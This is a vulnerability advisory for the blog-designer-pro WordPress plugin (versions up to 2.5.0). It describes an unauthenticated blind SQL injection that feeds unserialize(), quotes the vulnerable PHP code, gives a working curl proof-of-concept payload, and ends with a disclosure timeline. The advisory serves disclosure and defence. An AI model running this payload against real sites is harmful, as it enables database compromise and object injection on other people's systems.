WordPress plugin: blog-designer-pro <= 2.5.0 - blind SQL injection leading to PHP Object Injection
##Abstract
Blog Designer is an effective and user friendly way to beautify your blog pages on your websites. It’s very popular plugin for website’s WordPress blog to attract more clients as well as more blog visitors. Blog Designer makes your blog section more intuitive with no coding skill. It’s very easy to manage for beginners to website developers. Blog designer plugin bundled with precisely designed 45 templates for various category and we will keep adding more in future version.[1]
##Vulnerability - blind SQL injection leading to PHP Object Injection
There’s an uprivileged ajax action that’s vulnerable to SQL injection, and the results of which are then passed verbatim to unserialize():
add_action('wp_ajax_nopriv_get_loadmore_blog', array(&$this, 'bdp_loadmore_blog'), 12);
...
function bdp_loadmore_blog() {
global $wpdb;
ob_start();
$blog_shortcode_id = $_POST['blog_shortcode_id'];
$tableName = $wpdb->prefix . 'blog_designer_pro_shortcodes';
$get_settings_query = "SELECT * FROM $tableName WHERE bdid = " . $blog_shortcode_id;
$settings_val = $wpdb->get_results($get_settings_query, ARRAY_A);
$allsettings = $settings_val[0]['bdsettings'];
if (is_serialized($allsettings)) {
$bdp_settings = unserialize($allsettings);
}
I didn’t look to see if there’s a variable in the templates that could be used to smuggle information out of the database, but it’s possible there’s one there also. The unserialize is a big deal though because for example I can do this if there’s a Class Foo anywhere in WordPress:
curl -v -d 'action=get_loadmore_blog' -d 'blog_layout=blog_layout' -d "blog_shortcode_id=-1 UNION SELECT NULL,NULL,CONCAT(0x4f,0x3a,0x33,0x3a,0x22,0x46,0x6f,0x6f,0x22,0x3a,0x30,0x3a,0x7b,0x7d,0x3b)" http://vulnerable.host/wp-admin/admin-ajax.php
Tested on a much older version, but I can’t see anything in 2.5 that’d stop it. This will result in a 500 server error, because the object can’t be used as an array:
PHP Fatal error: Uncaught Error: Cannot use object of type Foo as array in /www/wp-content/plugins/blog-designer-pro/blog-designer-pro.php:1061
… however debugging shows that the __destruct() method is still called, so if for example a plugin with Guzzle 6.0.x is installed, arbitrary file writes anywhere that PHP has privileges should be fairly trivial - exploiting this is left as an exercise for the reader.
It looks like wp_ajax_nopriv_get_load_onscroll_blog and wp_ajax_nopriv_filter_change actions are vulnerable as well.
##Solution
This is apparently fixed in v2.5.1 - the client ceased using it so I wasn’t able to check it.
##Disclosure Timeline
- 2019-02-23: Vendor contacted via Envato contact form, which rejected my message - presumably due to the PoC.
- 2019-02-23: Vendor contacted via their support website.
- 2019-02-25: Fix pushed out.
- 2019-02-26: Public disclosure.
##References